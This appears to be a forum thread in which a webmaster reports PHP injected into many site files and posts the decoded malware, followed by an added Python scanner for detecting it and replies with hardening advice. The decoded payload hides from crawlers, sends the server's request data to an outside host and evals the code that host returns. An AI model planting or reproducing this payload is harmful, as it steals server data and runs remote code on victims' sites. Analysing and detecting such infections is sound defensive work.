At one of our sites I found bad code at the top of the index.php and main.php files of nearly all scripts (calendars, gallery scripts, file uploading forms, etc.).
I have written this bad code below; it was redirecting especially mobile viewers to a porn site.
I cleaned that code from about 25 files, but I am not sure whether it will come back again or not.
Most of our scripts seem to be updated to the latest versions. What can I do for better security? We don't want this to happen again.
What can you suggest, and what is the reason for that hacking? Please give me info.
I decoded the bad code with an online decoding source. It is as follows:
Maybe it helps to answer my questions above better.
I wonder if there may be another file on the server that puts this bad code into our PHP files. If so, how can I find it?
The site is a big site.
Thanks
Decoded code:
PHP Code:
// (comments added to the decoded payload; the code itself is unchanged)
error_reporting(0);                          // suppress PHP errors so the infection stays quiet
if(!$hkuh_b) { global $hkuh_b; $hkuh_b = 1;  // run at most once per request, even if several infected files are included
$bkljg=$_SERVER["HTTP_USER_AGENT"];
// user-agent fragments of crawlers, link checkers and feed readers: visitors the redirect must stay hidden from
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS");
// do nothing for crawlers, empty user agents, self-referrals, local requests, safe_mode, visitors already carrying a "statsl"/"statsle" cookie, or requests with the df/dl control values
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and !(@$_COOKIE['statsle']) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['statsl']) or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1") or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" ) or (ini_get("safe_mode")) or (!function_exists('file_get_contents')) or (!function_exists('ob_start'))))
{}
else
{
// otherwise POST every $_SERVER variable, base64-encoded, to the attacker's callback URL ...
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
'timeout' => '15',
'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
'method' => 'POST',
'content' => "REM_REM='1'".$data_nfdh
)));
// ... and eval whatever PHP it sends back (the redirect); if nothing comes back, set "statsl=2" for 48 hours so this visitor is not tried again
$vkfu=file_get_contents("http://galeria.banaszek.info/plugins/flvplayer/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start(); if(!@headers_sent()) { @setcookie("statsl","2",time()+172800); } else { echo "<script>document.cookie='statsl=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';</script>"; } ;};
}
}
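As an added example (it is not code from the original post, nor a tool from any project mentioned here), the following Python scanner does the two things the questions above ask for: it finds PHP files that still carry the injected prologue, looking both at the raw text and behind one layer of base64 encoding, and it records a SHA-256 manifest after the clean-up so that a later scan shows exactly which files were touched again. The indicator strings (the "statsl"/"statsle" cookie names, the callback host, the eval of a fetched variable) are taken from the decoded sample above; the generic eval(base64_decode( and eval(gzinflate( prologues are added as common obfuscation patterns. It assumes a web root readable by the account running it; the infected and clean files it builds under a temporary directory are constructed samples.

```python
"""Scan a web root for the injected PHP prologue and keep a hash manifest so
re-infection is visible later. Added example; not code from the original post."""
import base64
import hashlib
import os
import re
import tempfile

# Indicators: generic obfuscation prologues plus strings taken from the
# decoded sample in the thread (its cookie names, its callback host, and
# the eval of the variable that holds the fetched code).
INDICATORS = {
    "eval(base64_decode(": re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I),
    "eval(gzinflate(": re.compile(r"eval\s*\(\s*gzinflate\s*\(", re.I),
    "statsl cookie": re.compile(r"['\"]statsle?['\"]"),
    "callback host": re.compile(r"galeria\.banaszek\.info", re.I),
    "eval of variable": re.compile(r"@?eval\s*\(\s*\$\w+\s*\)"),
}
# A long base64 literal handed to base64_decode(); it is decoded so that
# indicators sitting behind one layer of encoding still match.
B64_ARG = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]{40,})['\"]")


def decoded_layers(text):
    """The text itself plus the decoded form of each long base64 literal."""
    layers = [text]
    for m in B64_ARG.finditer(text):
        try:
            layers.append(base64.b64decode(m.group(1)).decode("latin-1"))
        except ValueError:  # not valid base64 after all
            pass
    return layers


def scan_text(text):
    """Names of the indicators found in text or in its decoded layers."""
    layers = decoded_layers(text)
    return [name for name, pat in INDICATORS.items()
            if any(pat.search(layer) for layer in layers)]


def scan_tree(root, exts=(".php", ".inc", ".phtml")):
    """Scan every PHP file under root. Returns (findings, manifest): findings
    maps relative path -> indicator names, manifest maps relative path ->
    sha256. Store the manifest after a clean-up; a later scan can then show
    exactly which files were touched again."""
    findings, manifest = {}, {}
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, "rb") as f:
                data = f.read()
            hits = scan_text(data.decode("latin-1"))
            if hits:
                findings[rel] = hits
            manifest[rel] = hashlib.sha256(data).hexdigest()
    return findings, manifest


def changed_since(old_manifest, new_manifest):
    """Files added or modified since the stored manifest. A dropper that
    rewrites files, or a variant the indicator list does not know, shows
    up here even when scan_text finds nothing."""
    return sorted(rel for rel, digest in new_manifest.items()
                  if old_manifest.get(rel) != digest)


def _write(path, text):
    with open(path, "w") as f:
        f.write(text)


def demo():
    """Constructed web root with one infected and one clean file: scan, clean
    up, store the manifest, then alter a file the way a dropper would and
    let the manifest diff catch it. Returns the intermediate results."""
    # Constructed stand-in for the hidden payload: just the indicator strings.
    payload = b"error_reporting(0); @setcookie('statsl','2'); @eval($vkfu);"
    prologue = "<?php eval(base64_decode('%s')); ?>\n" % base64.b64encode(payload).decode()
    clean = "<?php echo 'page'; ?>\n"
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "gallery"))
        index = os.path.join(root, "gallery", "index.php")
        main = os.path.join(root, "main.php")
        _write(index, prologue + clean)
        _write(main, clean)
        first_findings, _ = scan_tree(root)
        _write(index, clean)                       # clean-up, as the poster did
        after_cleanup, baseline = scan_tree(root)  # keep this as the baseline
        _write(main, "<?php /* dropped */ ?>\n" + clean)  # a file changes again
        later_findings, later = scan_tree(root)
    return {"first_findings": first_findings, "after_cleanup": after_cleanup,
            "later_findings": later_findings,
            "changed": changed_since(baseline, later)}
```

Run scan_tree over the real web root, fix what it reports, then run it again and save the manifest (json.dump works) somewhere outside the web root. If a later scan lists files in changed_since while nobody deployed anything, the file modification times of those entries and the web-server and FTP logs for that window are where to look for whatever wrote them, which is the "other file on the server" question. The indicator list only knows this one sample and two common prologues, so the manifest diff, not the indicator hits, is the part to rely on for catching a return.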
The fact that it's base64-encoded PHP code has nothing to do with how it got onto your site; that's just the payload the attacker left once they found a way in. They may have hacked your site login or FTP password (so it's probably time to change all passwords to longer, more difficult to hack passwords, and make sure all access to the site's control panel and FTP (or really SFTP) is via SSL). If you're on a shared hosting plan, it may have come through another hacked account on that same host, or even someone who registered an account there so they could access other accounts' directories on a poorly configured host (so you might want to consider upgrading to a VPS plan, or even moving to a different host). There may be a security hole in one of your site's pages that allowed them to drop in a script to modify your PHP files (and then perhaps delete itself), which might require a detailed security analysis to find (and make sure all your 3rd-party apps have the latest security patches!).
Hey weed, thanks for the links. I've not seen this site before and it shall give me some reading to do.
I decoded the bad code with an online decoding source. It is as follows:
Incidentally there was no need to go to an "online decoding source" to decode the base64. The decoding mechanism is built right into PHP and was used by what you posted: base64_decode.